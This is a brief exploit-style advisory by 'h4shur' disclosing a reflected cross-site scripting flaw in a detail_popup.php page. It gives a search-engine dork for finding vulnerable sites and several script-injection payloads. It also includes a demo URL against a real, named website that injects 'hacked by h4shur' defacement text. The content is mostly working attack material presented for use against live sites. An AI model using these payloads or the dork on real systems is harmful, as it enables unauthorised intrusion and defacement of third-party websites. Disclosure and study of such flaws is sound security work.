[+] Title: detail_popup Cross Site Scripting (XSS)
[+] date: 2020-06-19
[+] Author: h4shur
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: /detail_popup.php?img=&dr=
[+] Vulnerable Parameter: Get Method
[+] Dork: inurl:"/detail_popup.php?img="
### POC:
[+} site.com/[folder]/detail_popup.php?img=&dr=
### Xss Alert Code: "><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] http://www.daumier-register.org/detail_popup.php?img=DR2292_1&dr=%22%3E%3Cmarquee%3Ehacked%20by%20h4shur%3C/marquee%3E
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur